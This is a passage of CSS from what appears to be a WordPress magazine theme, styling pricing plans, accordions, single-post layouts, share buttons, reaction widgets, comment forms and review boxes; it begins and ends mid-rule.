padding-top: 5px; } .additional-title { margin-top: 25px; } .address-info > *:last-child { margin-bottom: 0; } .address-info a:hover { color: var(--g-color); } .newsletter-fw.has-bg { padding-top: 40px; padding-bottom: 40px; text-align: center; background-repeat: no-repeat; background-position: center center; background-size: cover; } .w-banner { position: relative; display: block; overflow: hidden; padding: 110px 30px; text-align: center; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } .w-banner-content { position: relative; z-index: 9; display: flex; display: -webkit-flex; align-items: center; flex-grow: 1; justify-content: center; min-height: 240px; } .w-banner-desc.element-desc { font-size: var(--rem-small); max-width: 100%; margin-top: 20px; margin-right: auto; margin-left: auto; } .banner-bg, .w-banner .banner-bg img { position: absolute; top: 0; left: 0; width: 100%; height: 100%; object-position: top center; } .banner-btn { display: inline-block; margin-top: 20px; text-align: center; -webkit-border-radius: var(--round-5); border-radius: var(--round-5); } /** plan box */ .plan-inner { position: relative; display: block; padding: 40px 20px; border-radius: var(--round-5); } .is-box-shadow .plan-inner { border-radius: var(--round-5); background-color: var(--plan-box-color, transparent); box-shadow: 0 5px 30px var(--shadow-7); } .is-box-border .plan-inner { border: 1px solid var(--plan-box-color, var(--flex-gray-15)); } .is-box-bg .plan-inner { background-color: var(--plan-box-color, var(--flex-gray-7)); } .plan-inner > *:not(:last-child) { margin-bottom: 30px; } .plan-header > *:not(:last-child) { margin-bottom: 15px; } .plan-features { font-size: var(--rem-small); display: flex; flex-flow: column nowrap; } .plan-feature:not(:last-child) { display: inline-flex; margin-bottom: 7px; } .plan-feature:before { font-family: 'ruby-icon' !important; display: inline-flex; margin-right: 5px; content: '\e960'; color: #42c337; } .plan-description { font-size: var(--rem-small); } [data-theme='dark'] .plan-feature:before, .light-scheme .plan-feature:before { color: var(--absolute-white); } .plan-price-wrap { font-size: 1.2rem; line-height: 1; display: flex; align-items: center; flex-flow: row nowrap; } .plan-tenure { color: var(--meta-fcolor); } .plan-price { font-size: 3rem; padding: 0 2px; } .plan-price-unit { margin-top: -.5em; } .plan-button-wrap button, .plan-button-wrap a.button, .plan-button-wrap .stripe-button-el { width: 100%; padding-top: 7px; padding-bottom: 7px; background: var(--plan-button-bg, var(--g-color)); background-image: none; box-shadow: none; } .plan-button-wrap a.button { font-size: var(--rem-small); display: inline-block; text-align: center; } .plan-button-wrap button span, .plan-button-wrap .stripe-button-el span { font-family: inherit !important; font-size: var(--plan-button-size, var(--rem-small)); font-style: inherit !important; color: var(--plan-button-color, inherit); background: none !important; background-image: none !important; -webkit-box-shadow: none; box-shadow: none !important; -webkit-text-shadow: none; text-shadow: none !important; } .plan-button-wrap button:hover, .plan-button-wrap .button:hover, .plan-button-wrap .stripe-button-el:not(:disabled):active, .plan-button-wrap .stripe-button-el.active { background: var(--plan-button-bg, var(--g-color)); -webkit-box-shadow: 0 4px 15px var(--plan-button-bg-opacity, var(--g-color-90)); box-shadow: 0 4px 15px var(--plan-button-bg-opacity, var(--g-color-90)); } /** accordion */ .rb-accordion .elementor-accordion { border-radius: var(--round-5); box-shadow: 0 5px 30px var(--shadow-7); } .rb-accordion .elementor-accordion .elementor-accordion-title { font-family: var(--h4-family); font-size: var(--h4-fsize); font-weight: var(--h4-fweight); font-style: var(--h4-fstyle); line-height: var(--h4-fheight, 1.45); letter-spacing: var(--h4-fspace); text-transform: var(--h4-transform); color: inherit !important; } .rb-accordion .elementor-accordion-icon { width: 15px !important; color: inherit !important; } .rb-accordion .elementor-accordion-icon i { font-size: 10px; } .rb-accordion .elementor-tab-content { font-family: var(--body-family); font-size: var(--body-fsize); font-weight: var(--body-fweight); font-style: var(--body-fstyle); line-height: 1.7; letter-spacing: var(--body-fspace); text-transform: var(--body-transform); color: var(--body-fcolor); } .rb-accordion .elementor-accordion .elementor-accordion-item { border: none; border-bottom: 1px solid var(--flex-gray-15); } .rb-accordion .elementor-accordion { border-radius: var(--round-5); } .rb-accordion .elementor-accordion .elementor-tab-content { border-color: var(--flex-gray-15); } .rb-accordion .elementor-accordion .elementor-tab-title { -webkit-transition: var(--effect); transition: var(--effect); opacity: .3; } .rb-accordion .elementor-accordion-item:hover .elementor-tab-title, .rb-accordion .elementor-accordion .elementor-tab-title.elementor-active { opacity: 1; } /* ----------------- 9 - Single ----------------- */ .single-post-outer:not(:last-child) { margin-bottom: 20px; border-bottom: 1px solid var(--flex-gray-15); } .single-infinite-point .rb-loader { margin-bottom: 25px; } .single-post-outer.has-continue-reading .s-ct { overflow: hidden; height: 700px; max-height: 700px; } .single-post-outer.has-continue-reading .single-sidebar { position: relative; } .single-post-outer.has-continue-reading .sidebar-inner { position: absolute; z-index: 1; right: 0; left: 0; } .single-post-outer.has-continue-reading { overflow: hidden; } .continue-reading { position: relative; z-index: 100; display: flex; justify-content: center; padding: 30px 0 40px 0; background-color: var(--solid-white); } .continue-reading:before, .restrict-box:before { position: absolute; right: 0; bottom: 99%; left: 0; display: block; width: 100%; height: 150px; content: ''; background-image: linear-gradient(to top, var(--solid-white) 0, transparent 100%); } .continue-reading-btn.is-btn { font-size: var(--rem-small); display: inline-flex; } .grid-container { position: relative; display: flex; flex-flow: row wrap; flex-basis: 100%; margin-right: -30px; margin-left: -30px; } .grid-container > * { flex: 0 0 100%; width: 100%; padding-right: 30px; padding-left: 30px; } .single-meta { display: flex; align-items: center; flex-flow: row nowrap; justify-content: space-between; width: 100%; } .smeta-in { display: flex; align-items: center; flex-flow: row nowrap; justify-content: flex-start; } .smeta-in > .meta-avatar { margin-right: 12px; } .smeta-in > .meta-avatar img { width: 60px; height: auto; border-radius: 100%; } .single-meta .p-meta, .overlay-text .single-meta .p-meta { margin-bottom: 3px; } .share-action i { text-shadow: 3px 3px 0 #ffffff10, 2px 2px 0 #00000020; } [data-theme='dark'] .l-shared-sec .share-action i, .light-scheme .l-shared-sec .share-action i, [data-theme='dark'] .t-shared-sec .share-action i, .light-scheme .t-shared-sec .share-action i, [data-theme='dark'] .sticky-share-list .share-action i, .light-scheme .sticky-share-list .share-action i { text-shadow: none; } .share-action.is-mobile.icon-whatsapp { display: flex; display: -webkit-flex; } .share-action.is-web.icon-whatsapp { display: none; } .smeta-extra { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; } .share-action, .footer-social-list a { -webkit-transition: var(--effect); transition: var(--effect); } .t-shared-sec { display: flex; align-items: center; } .sticky-share-list > * { display: flex; flex-flow: row nowrap; } .t-shared-sec > *:not(.t-shared-header) { display: flex; flex-flow: row wrap; } .sticky-share-list .share-action, .t-shared-sec .share-action { font-size: 16px; display: inline-flex; padding-right: 6px; padding-left: 6px; } .single-time-read { display: flex; align-items: center; flex-flow: row nowrap; flex-shrink: 0; white-space: nowrap; } .single-time-read:before { display: inline-flex; height: 8px; margin-right: 10px; margin-left: 6px; content: ''; opacity: .5; border-left: 1px solid var(--flex-gray-40); } .single-header { position: relative; z-index: 109; display: block; } .s-cats, .s-breadcrumb { margin-bottom: 15px; } .s-title, .s-tagline, .single-meta { margin-bottom: 15px; } .s-feat-outer { margin-bottom: 30px; } .feat-caption { position: relative; margin-top: 10px; } .attribution { display: block; margin-top: 4px; padding-left: 65px; } .feat-caption .caption-text:before { position: relative; display: inline-flex; width: 50px; height: 1px; margin-right: 12px; padding-top: .75em; content: ''; vertical-align: top; border-bottom: 1px solid var(--g-color); } .caption-text { position: relative; display: block; } .s-feat img, .s-feat-holder img { display: block; width: 100%; object-fit: cover; } .s-feat-holder img { width: 100%; height: 100%; } .ubox:not(:first-child) { margin-top: 25px; padding-top: 25px; border-top: 1px solid var(--flex-gray-15); } .ubox-header { display: flex; align-items: center; flex-flow: row nowrap; width: 100%; } .author-info-wrap { display: flex; align-items: center; flex-flow: row nowrap; flex-grow: 1; } .author-avatar { width: 50px; height: auto; margin-right: 12px; } .author-avatar img { border-radius: 100%; } .author-info { display: flex; flex-flow: column nowrap; justify-content: center; } .usocials { display: flex; align-items: center; flex-flow: row nowrap; } .usocials > * { line-height: 1; } .usocials a { font-size: 13px; padding: 0 5px; -webkit-transition: var(--effect); transition: var(--effect); } .usocials a:hover { -webkit-transform: scale(1.2); transform: scale(1.2); } .author-job { line-height: 1; display: flex; margin-top: 5px; white-space: nowrap; } .ubox .ubio { display: block; margin-top: 20px; margin-bottom: 0; } .co-author .meta-author-label { display: none; } .meta-author-label.meta-label { margin-right: 0; } .ef-label { margin-right: 5px; color: var(--meta-fcolor) } .efoot { position: relative; clear: both; padding-top: calc(2rem + 2px); } .efoot:before { position: absolute; top: 0; left: 0; width: 50px; height: 3px; content: ''; border-radius: var(--round-7); background-color: currentColor; } .efoot > * { margin-top: 12px; } .efoot > *:first-child { margin-top: 0; } .efoot-bar { display: flex; align-items: center; width: 100%; } .blabel { display: inline-flex; align-items: center; margin-right: 10px; } .blabel i { line-height: 1; margin-right: 7px; } .blabel i.rbi-via { font-size: 1.25em; } .reaction-sec { position: relative; display: block; padding-top: 25px; } .reaction-wrap { display: flex; align-items: center; flex-flow: row wrap; justify-content: space-evenly; } .reaction { position: relative; display: flex; flex: 0 0 80px; flex-flow: row wrap; justify-content: center; max-width: 80px; padding: 5px 10px; cursor: pointer; } .reaction-heading { display: block; margin-bottom: 20px; text-align: center; } .reaction-content { width: 100%; } .reaction .reaction-icon { display: flex; justify-content: center; width: 100%; height: auto; margin: auto; -webkit-transition: transform .25s var(--timing); transition: transform .25s var(--timing); -webkit-transform: scale(1) rotate(0deg); transform: scale(1) rotate(0deg); will-change: transform; } .reaction-icon svg { width: 50px; height: 50px; } .reaction .reaction-title { font-size: var(--rem-small); line-height: 1; display: flex; justify-content: center; width: 100%; margin-top: 10px; -webkit-transition: color .25s var(--timing); transition: color .25s var(--timing); white-space: nowrap; } .reaction-count { font-weight: bold; line-height: 1; display: flex; align-items: center; justify-content: center; width: 100%; height: 1.25em; margin-top: 7px; white-space: nowrap; border-radius: var(--round-3); background-color: var(--flex-gray-7); } .reaction:hover .reaction-icon { -moz-transform: scale(1.2) rotate(-20deg); -ms-transform: scale(1.2) rotate(-20deg); -o-transform: scale(1.2) rotate(-20deg); -webkit-transform: scale(1.2) rotate(-20deg); transform: scale(1.2) rotate(-20deg); } .reaction:hover .reaction-title { color: var(--g-color); } .reaction.active .reaction-count { color: var(--absolute-white); background-color: var(--g-color); } .reaction:before { font-family: 'ruby-icon'; font-size: 18px; line-height: 18px; position: absolute; top: 6px; right: 6px; bottom: auto; left: auto; content: '\e942'; -webkit-transition: opacity .25s; transition: opacity .25s; pointer-events: none; opacity: 0; color: var(--g-color); } .reaction.loading:before { z-index: 10; width: auto; height: 18px; content: '\e942'; -webkit-transform-origin: center; transform-origin: center; -webkit-animation: reaction-spinner 1s linear infinite; animation: reaction-spinner 1s linear infinite; letter-spacing: 0; opacity: 1; will-change: transform; } .reaction.loading .reaction-icon { opacity: .5; } @keyframes reaction-spinner { to { transform: rotate(360deg); -webkit-transform: rotate(360deg); } } .e-shared-sec { display: flex; align-items: center; flex-flow: row nowrap; } .e-shared-header i { margin-right: .35em } .rbbsl { font-size: 18px; display: flex; flex-flow: row wrap; flex-shrink: 0; margin-left: auto; } .rbbsl > * { line-height: var(--height-40); display: inline-flex; margin-right: 10px; padding: 0 20px; border-radius: var(--round-3); background-color: var(--flex-gray-7); } .rbbsl a > span { margin-left: 7px; } .rbbsl a:not(:nth-child(1)) > span { display: none; } .rbbsl a:not(:nth-child(1)) { justify-content: center; padding: 0 12px; } .entry-sec { position: relative; padding-top: 37px; padding-bottom: 35px; } .entry-newsletter { position: relative; padding-top: 37px; } .entry-newsletter .newsletter-box-content { max-width: 600px; } .entry-sec:before, .entry-newsletter:before, .review-footer > *:not(.review-action):before { position: absolute; z-index: 1; top: 0; right: 0; left: 0; overflow: hidden; height: 3px; content: ''; background-image: linear-gradient(to right, var(--flex-gray-20) 20%, transparent 21%, transparent 100%); background-image: -webkit-linear-gradient(right, var(--flex-gray-20) 20%, transparent 21%, transparent 100%); background-repeat: repeat-x; background-position: 0 0; background-size: 5px; } .mobile-collapse-sections:before { position: absolute; z-index: 1; top: 0; right: 0; left: 0; overflow: hidden; height: 3px; content: ''; background-image: linear-gradient(to right, var(--submbnav-color-10, var(--subnav-color-10)) 20%, transparent 21%, transparent 100%); background-image: -webkit-linear-gradient(right, var(--submbnav-color-10, var(--subnav-color-10)) 20%, transparent 21%, transparent 100%); background-repeat: repeat-x; background-position: 0 0; background-size: 5px; } .e-shared-sec.entry-sec { padding-top: 18px; padding-bottom: 15px; } .e-shared-header { display: flex; align-items: center; flex-flow: row nowrap; } .reading-indicator { position: fixed; z-index: 9999; top: 0; right: 0; left: 0; display: block; overflow: hidden; width: 100%; height: var(--indicator-height); } #reading-progress { display: block; width: 0; max-width: 100%; height: 100%; -webkit-transition: width .1s ease; transition: width .1s ease; border-top-right-radius: 5px; border-bottom-right-radius: 5px; background: var(--g-color); background: linear-gradient(90deg, var(--indicator-bg-from) 0%, var(--indicator-bg-to) 100%); background: -webkit-linear-gradient(right, var(--indicator-bg-from), var(--indicator-bg-to)); } .comment-form-comment label, .comment-form-author label, .comment-form-email label, .comment-form-url label, .no-comment .comment-reply-title { display: none; } .newsletter-box-header { display: flex; align-items: center; margin-bottom: 25px; } .newsletter-icon { line-height: 0; flex-shrink: 0; margin-right: 25px; } .newsletter-icon svg { width: 60px; } .newsletter-box-title { margin-bottom: 10px; } .mc4wp-form-fields > * { display: flex; align-items: stretch; flex-flow: row nowrap; margin-top: 10px; } .mc4wp-form-fields > *:first-child { margin-top: 0; } .agree-to-terms { font-size: var(--rem-mini); width: 100%; color: var(--meta-fcolor); } .agree-to-terms input { margin: 4px 6px 0 0; } .mc4wp-form-fields input[type='email'] { flex-grow: 1; width: 100%; } .mc4wp-form-fields input:not(:first-child) { margin-left: 7px; } .newsletter-box-policy { font-size: var(--rem-mini); margin-top: 15px; color: var(--meta-fcolor); } .newsletter-box-policy a { transition: var(--effect); text-decoration: underline dotted; color: var(--body-fcolor); --webkit-transition: var(--effect); } .newsletter-box-policy a:hover { color: var(--g-color); } .newsletter-box-content input:not([type='submit']) { font-weight: bold; } .comments-area { display: block; } .comments-area .comment-meta a { text-decoration: none; } .comments-area #respond > #commentform { margin-top: 15px; } .comment-metadata .review-stars { font-size: 18px; letter-spacing: 1px; color: var(--body-fcolor); } .comment-awaiting-moderation { font-size: var(--rem-mini); display: inline-flex; width: 100%; margin-bottom: 7px; color: #d1a220; } .comment-awaiting-moderation:before { font-family: 'ruby-icon'; font-style: normal; display: inline-flex; margin-right: 4px; content: '\e949'; } .comment-form { position: relative; display: block; margin-right: -10px; margin-left: -10px; } .comment-form input[type='text'], .comment-form input[type='email'], .comment-form input[type='url'] { width: 100%; } .comment-form > * { margin-bottom: 20px; padding-right: 10px; padding-left: 10px; } .comment-form-cookies-consent { display: flex; display: -webkit-flex; align-items: center; flex-flow: row nowrap; flex-basis: 100%; width: 100%; } .comment-form-cookies-consent label { font-size: var(--rem-mini); padding-left: 5px; cursor: pointer; } .comment-notes .required { color: #ff4545; } .logged-in-as { font-size: var(--rem-mini); } .logged-in-as a:last-child { text-decoration: underline dotted; opacity: 0.5; } .logged-in-as a { -webkit-transition: var(--effect); transition: var(--effect); } .logged-in-as a:hover { text-decoration: underline; } .logged-in-as a:last-child:hover { opacity: 1; color: var(--g-color); } .comment-form > p.form-submit { display: block; margin-top: 20px; margin-bottom: 0; } .comment-form .comment-notes { font-size: var(--rem-mini); margin-bottom: 15px; } .comment-notes #email-notes { font-style: italic; } .comment-reply-title { line-height: 1; margin-bottom: 10px; } .comment-form-comment label, .comment-form-author label, .comment-form-email label, .comment-form-url label, .no-comment .comment-reply-title { display: none; } .comment-box-header { position: relative; display: block; } a.show-post-comment { line-height: var(--height-40); position: absolute; top: 0; right: 0; display: flex; align-items: center; padding: var(--padding-40); -webkit-transition: var(--effect); transition: var(--effect); border-radius: var(--round-7); background-color: var(--flex-gray-7); } a.page404-btn { line-height: var(--height-40); display: inline-block; color: inherit; border-radius: var(--round-7); background-color: var(--flex-gray-7); } a.show-post-comment:hover, a.page404-btn:hover { color: var(--absolute-white); background-color: var(--g-color); -webkit-box-shadow: 0 4px 15px var(--g-color-90); box-shadow: 0 4px 15px var(--g-color-90); } .comment-box-header > * { display: flex; display: -webkit-flex; align-items: center; } .comment-box-header i, .comment-box-header svg { margin-right: 10px; } .comment-box-header svg { width: 1em; } .comment-box-title i, .comment-box-title svg { border-bottom: 3px dotted var(--g-color); } .box-comment-btn { line-height: 42px; position: relative; display: flex; display: -webkit-flex; margin-left: auto; padding: 0 60px; -webkit-transition: var(--effect); transition: var(--effect); } .rb-form-rating { display: flex; display: -webkit-flex; align-items: center; width: 100%; } .rb-review-stars { font-size: 24px; position: relative; } .rb-review-stars span { line-height: 0; display: flex; display: -webkit-flex; align-items: center; flex-flow: row nowrap; flex-grow: 0; width: 0; margin-left: 10px; padding: 0; letter-spacing: 0; } .rb-review-stars span a { line-height: 1; display: flex; display: -webkit-flex; flex-grow: 0; padding: 2px; } .rb-form-rating label { font-size: var(--rem-mini); line-height: 1; padding-left: 7px; border-left: 4px solid var(--g-color); } .rb-review-stars span:hover i:before, .rb-form-rating.selected a i:before, .rb-form-rating.selected .rb-review-stars span:hover a i:before { content: '\e951'; } .rb-review-stars span > a.active ~ a i:before, .rb-review-stars span > a:hover ~ a i:before, .rb-form-rating.selected .rb-review-stars span > a:hover ~ a i:before { content: '\e94f'; } .rb-review-stars i { -webkit-transition: var(--effect); transition: var(--effect); } .comment-title h3 { margin-bottom: 30px; } .comment-title i { display: inline; margin-right: 5px; } .comment-author { font-size: var(--rem-small); margin-bottom: 7px; } .comment-author .avatar { position: absolute; top: 3px; left: -65px; display: block; width: 50px; height: 50px; -webkit-border-radius: 50%; border-radius: 50%; object-fit: cover; } .comment-author .says { display: none; } .comment-list { position: relative; display: block; margin-top: 35px; margin-bottom: 25px; border-bottom: 1px dashed var(--flex-gray-15); } .comment-body { position: relative; display: block; width: auto; max-width: 100%; margin-bottom: 25px; margin-left: 65px; } .comment-list li.parent > .comment-body { margin-bottom: 20px; } .comment-metadata { font-family: var(--meta-family); font-size: var(--meta-fsize); line-height: 1; display: flex; align-items: center; flex-flow: row wrap; color: var(--meta-fcolor); } .comment-metadata > * { margin-bottom: 7px; } .comment-metadata * { font-family: inherit; font-size: inherit; font-weight: inherit !important; line-height: inherit; } .comment-content { font-size: var(--excerpt-fsize); position: relative; display: block; margin-top: 10px; } .comment-content p, .comment-content li { font-size: inherit; } a.comment-reply-link { line-height: 24px; position: absolute; z-index: 99; top: 0; right: 0; display: block; padding: 0 12px; -webkit-transition: var(--effect); transition: var(--effect); letter-spacing: var(--btn-fspace); border: 1px solid rgba(0, 0, 0, .05); border-radius: var(--round-3); } a.comment-reply-link:hover { color: #fff; background-color: var(--g-color); } .comments-area .comment-meta a.comment-edit-link { margin-left: 10px; } .comments-area .comment-meta > a:first-child { margin-left: 0; } .comments-area .comment-meta a.comment-edit-link:hover { text-decoration: underline dotted; } a.comment-reply-link:before { font-family: 'ruby-icon'; font-size: .9em; margin-right: 5px; content: '\e902'; } .comment-list .logged-in-as a { font-weight: inherit; -webkit-transition: var(--effect); transition: var(--effect); text-decoration: none; } .logged-in-as a:hover, .comment-list .logged-in-as a:hover { text-decoration: underline; } .comment-list .comment-reply-title small a { font-size: var(--rem-mini); margin-left: 7px; -webkit-transition: var(--effect); transition: var(--effect); white-space: nowrap; text-transform: none; color: var(--g-color); } .comment-list .comment-reply-title small a:hover { text-decoration: underline dotted; } .comment-list .comment-respond { margin-bottom: 35px; margin-left: 65px; } .comment-list ul.children { margin-left: 30px; } .e-pagi { position: relative; display: block; margin-right: -7px; margin-left: -7px; } .e-pagi .inner { display: flex; display: -webkit-flex; align-items: stretch; flex-flow: row nowrap; flex-grow: 1; } .e-pagi .nav-el { display: flex; display: -webkit-flex; flex: 0 0 50%; width: 50%; padding-right: 7px; padding-left: 7px; } .e-pagi a { display: flex; display: -webkit-flex; flex: 1; flex-flow: column nowrap; } .e-pagi .rbi-angle-left { padding-right: 5px; } .e-pagi .rbi-angle-right { padding-left: 5px; } .e-pagi .nav-label { margin-bottom: 12px; letter-spacing: .1em; text-transform: uppercase; } .e-pagi .nav-right { margin-left: auto; } .e-pagi .nav-right .nav-label { margin-left: auto; } .e-pagi .nav-inner { display: flex; display: -webkit-flex; align-items: center; } .e-pagi i { letter-spacing: 0; } .e-pagi img { display: flex; flex-shrink: 0; width: 50px; height: 50px; margin-right: 12px; border-radius: 50%; } .e-pagi .nav-right .nav-inner { flex-direction: row-reverse; text-align: right; } .e-pagi .nav-right img { margin-right: 0; margin-left: 12px; } .review-section { position: relative; display: block; overflow: hidden; border-radius: var(--round-7); box-shadow: 0 5px 30px var(--shadow-7); } .review-intro { position: relative; display: flex; overflow: hidden; flex-flow: row nowrap; } .review-section .review-intro { background-color: var(--dark-accent); } .review-feat { flex-shrink: 0; width: 100px; } .review-intro .review-feat img { width: 100%; height: 100%; object-fit: cover; } .review-bg { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; } .review-section .review-bg img { width: 100%; height: 100%; opacity: .5; object-fit: cover; } .review-intro .inner { position: relative; display: flex; align-items: center; flex-grow: 1; padding: 30px 20px; } .review-heading { display: flex; align-items: flex-start; flex-flow: column nowrap; } .review-intro .meta-info { display: flex; align-items: flex-end; flex-flow: column nowrap; justify-content: flex-end; margin-left: auto; } .review-intro .average { display: flex; align-items: flex-start; flex-flow: row nowrap; } .review-intro .meta-description { margin-right: 7px; } .review-heading > *:not(:last-child), .review-section .meta-info > *:not(:last-child) { margin-bottom: 10px; } .review-section .rline-wrap, .review-section .rstar-wrap { margin-right: 0; } .review-header .rstar:before { background-color: var(--absolute-dark); } .review-intro .rstar-wrap { margin-right: 0; } .review-section .review-intro .average, .review-section .review-heading { text-shadow: 0 0 5px rgba(0, 0, 0, .15); } .review-content { padding: 25px 30px; } .review-el { display: flex; align-items: center; } .review-el:not(:last-child) { margin-bottom: 15px; } .review-rating { margin-left: auto; } .review-label { display: flex; flex-flow: column; } .rating-info { margin-top: 3px; margin-left: 13px; } .review-label .h5 { line-height: 1; padding-left: 10px; border-left: 3px solid var(--review-color); } .review-footer { position: relative; display: block; margin: 0 30px; } .review-footer > *:not(.review-action) { position: relative; padding: 28px 0 25px 0; } .pros-cons-holder { margin-right: -20px; margin-left: -20px; } .pros-cons .inner { display: flex; flex-flow: row wrap; width: 100%; } .pros-cons .inner > * { display: flex; flex: 0 0 50%; justify-content: center; width: 50%; padding: 0 20px; } .pros-cons-list-inner { display: inline-block; } .pros-cons-list-inner > * { display: block; margin-top: 7px; } .pros-cons-title { display: flex; align-items: center; flex-flow: row nowrap; margin-top: 0; padding-bottom: 5px; } .pros-cons-title svg { width: var(--em-mini); margin-right: 7px; } .pros-cons-el i { font-size: 9px; display: inline-block; margin-right: 7px; vertical-align: middle; color: #426d48; } .pros-cons-el i.rbi-minus { font-size: 11px; color: #cd3048; } .review-summary-title { display: block; margin-bottom: 15px; } .summary-content, .pros-cons-el { font-size: var(--rem-mini); } .user-rating, .rating-header { line-height: 0; display: flex; align-items: center; flex-flow: row nowrap; } .average-info { margin-left: auto; } .user-rating svg { width: 1.35em; margin-right: 5px; } .total-vote { margin-left: 5px; } .review-action { display: flex; padding-bottom: 25px; } .review-btn { display: inline-flex; align-items: center; } .review-btn i { font-size: 1.25em; margin-right: 5px; } .sfoter-sec { position: relative; margin-bottom: 40px; } .sfoter-sec .block-h { margin-bottom: 20px; } .single-related { padding-top: 30px; } .single-related:before { position: absolute; z-index: -1; top: 0; bottom: 0; left: 50%; width: 100vw; max-width: 100vw; height: 100%; content: ''; -webkit-transform: translateX(-50%); transform: translateX(-50%); pointer-events: none; border-top: 1px solid var(--flex-gray-15); } /* single highlights */ .s-hl { position: relative; padding-top: 20px; padding-bottom: 30px; } .s-hl-heading.h1 { font-size: 2.75rem; line-height: 1; position: absolute; z-index: -1; top: -10px; left: 15px; opacity: .15; } .s-hl-heading span { display: inline-block; } .s-hl-heading span::first-letter { color: var(--g-color); } .s-hl:after { position: absolute; top: auto; bottom: 0; left: 0; width: 90px; height: 1px; content: ''; background-color: var(--g-color); } .s-hl ul { position: relative; list-style: none; } .hl-point:before { position: absolute; top: .5em; display: inline-block; width: 8px; height: 8px; content: ''; -webkit-border-radius: 100%; border-radius: 100%; background-color: var(--g-color); } .hl-point { position: relative; } .hl-point > * { display: inline-block; margin-left: 20px; } .hl-point:not(:last-child) > * { margin-bottom: 7px; padding-bottom: 7px; border-bottom: 1px solid var(--flex-gray-15); } .single-standard-1 .single-header { padding-top: 15px; } .single-standard-2 .single-header-inner { padding-top: 25px; } .single.is-standard-2 .header-transparent, .single.is-audio-2 .header-transparent, .single.is-video-2 .header-transparent { position: relative; top: auto; right: auto; left: auto; } .yes-hd-transparent.is-standard-5 .navbar-inner { border-bottom: 1px solid var(--flex-gray-20); } .single-standard-2 .single-header { margin-bottom: 30px; } .single-standard-7 .single-header { margin-bottom: 30px; padding-top: 20px; } .single-standard-1 .s-feat img, .single-standard-2 .s-feat img, .single-standard-7 .s-feat img, .single-standard-8 .s-feat img { border-radius: var(--round-5); } .single-standard-2 .s-feat img, .single-standard-7 .s-feat img { -webkit-box-shadow: 0 4px 30px var(--shadow-7); box-shadow: 0 4px 30px var(--shadow-7); } .single-standard-3 .single-header, .single-standard-4 .single-header { padding-top: 10px; padding-bottom: 30px; } .single-standard-3 .single-header-inner, .single-standard-4 .single-header-inner { overflow: hidden; border-radius: var(--round-5); } .single-standard-5 .single-header { padding-bottom: 30px; } .single-standard-8.single-embed-4 .grid-container, .single-standard-8 .grid-container { margin-top: 30px; } .single-embed-4 .s-feat-outer { margin-bottom: 0; padding-top: 30px; } .single-embed-4 .single-header { margin-bottom: 30px; } .single .single-no-featured .single-header { margin-bottom: 20px; padding-bottom: 0; border-bottom: 5px solid var(--flex-gray-15); } .without-sidebar .single-caption-outer.rb-container, .without-sidebar .single-caption-outer { max-width: 860px; margin-right: auto; margin-left: auto; } .single-header-inner { position: relative; display: block; } .single-standard-2 .single-header-inner:before { position: absolute; z-index: 0; top: 0; right: 0; bottom: 90px; left: 0; width: 100%; content: ''; background-color: var(--dark-accent); } .single-standard-2.no-sfeat .single-header-inner:before { bottom: 0; } .single-standard-2.no-sfeat .single-header-inner { padding-bottom: 10px; } .single-standard-2 .single-header-inner > * { position: relative; z-index: 1; } .single-embed-2 .embed-bg-overlay { position: absolute; top: 0; right: 0; bottom: 90px; left: 0; width: 100%; opacity: .1; background-repeat: no-repeat; background-position: center; background-size: cover; filter: blur(10px); -webkit-filter: blur(10px); } .s-feat-holder { position: absolute; top: 0; right: 0; bottom: 0; left: 0; display: block; overflow: hidden; } .single-header-content { position: relative; z-index: 1; display: flex; flex: 0 0 100%; flex-flow: column nowrap; padding-right: 20px; padding-left: 20px; } .single-standard-3 .single-header-inner:before, .single-standard-4 .single-header-inner:before { position: relative; display: block; padding-bottom: 33%; content: ''; } .single-header-content:before { position: absolute; z-index: -1; bottom: 0; left: 0; display: block; width: 100%; height: 140%; content: ''; background: var(--dark-accent); background: linear-gradient(to top, var(--dark-accent) 20%, transparent 100%); } .single-standard-4 .single-header-content { max-width: 940px; } .single-standard-4 .single-header-content:before { height: calc(100% - 7px); border-top-right-radius: var(--round-5); background: var(--dark-accent); } .single-standard-5 .single-header-content { padding: 20% 0; } .single-standard-5 .single-header-content:before { display: none; } .full-dark-overlay { background-color: var(--dark-accent); } .full-dark-overlay img { opacity: .3; } .single-standard-6 .single-header { margin-bottom: 30px; } .single-standard-6 .single-header:before { position: absolute; top: 0; right: 0; bottom: 40px; left: 0; content: ''; background-color: var(--flex-gray-7); } .single-header-columns { display: flex; align-items: center; margin-right: -20px; margin-left: -20px; } .single-header-columns > * { padding-right: 20px; padding-left: 20px; } .single-header-left { position: relative; flex: 0 0 60%; max-width: 100%; } .single-standard-6 .s-feat-outer { position: relative; flex: 0 0 40%; margin-bottom: 0; } .featured-vertical { position: relative; display: block; overflow: hidden; padding-bottom: 150%; border-bottom-right-radius: var(--round-5); border-bottom-left-radius: var(--round-5); } .featured-vertical img { position: absolute; top: 0; right: 0; bottom: 0; left: 0; width: 100%; height: 100%; object-fit: cover; } .single-standard-6 .caption-holder { position: absolute; top: auto; right: 20px; bottom: 0; left: 20px; border-bottom-right-radius: var(--round-5); border-bottom-left-radius: var(--round-5); background: -webkit-linear-gradient(top, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .25) 30%, rgba(0, 0, 0, .8) 100%); background: linear-gradient(to bottom, rgba(0, 0, 0, 0) 0%, rgba(0, 0, 0, .25) 30%, rgba(0, 0, 0, .8) 100%); } .single-standard-6 .feat-caption { margin: 10px 20px 10px 20px; } .sqview > *:not(:last-child) { margin-bottom: 10px; } .qview-box { overflow: hidden; align-items: stretch; border-radius: var(--round-5); background-color: var(--flex-gray-7); } .qview-box.review-intro .inner { padding: 15px; } .qview-box .review-action { margin-top: 7px; padding-bottom: 0; } .qview-box .review-btn { line-height: var(--height-34); padding: 0 25px; } .spon-qview { padding: 4px 12px; } .spon-qview .sponsor-meta { margin-bottom: 0; } .spon-qview .sponsor-inner img { height: 3em; max-height: 50px; } .spon-qview .sponlogo-wrap { margin-right: 0; margin-left: auto; } .single .without-sidebar .s-ct { flex-basis: 100%; width: 100%; max-width: var(--max-width-wo-sb); margin-right: auto; margin-left: auto; } .featured-embed { position: relative; display: block; overflow: hidden; } .embed-holder { position: relative; display: block; width: 100%; padding-bottom: 56%; background-color: rgba(0, 0, 0, .025); } .float-holder { -webkit-transform: var(--effect); transform: var(--effect); } .floating-activated .float-holder { position: fixed; z-index: 9999; top: auto; right: 20px; bottom: 100px; left: auto; display: block; width: 420px; max-width: 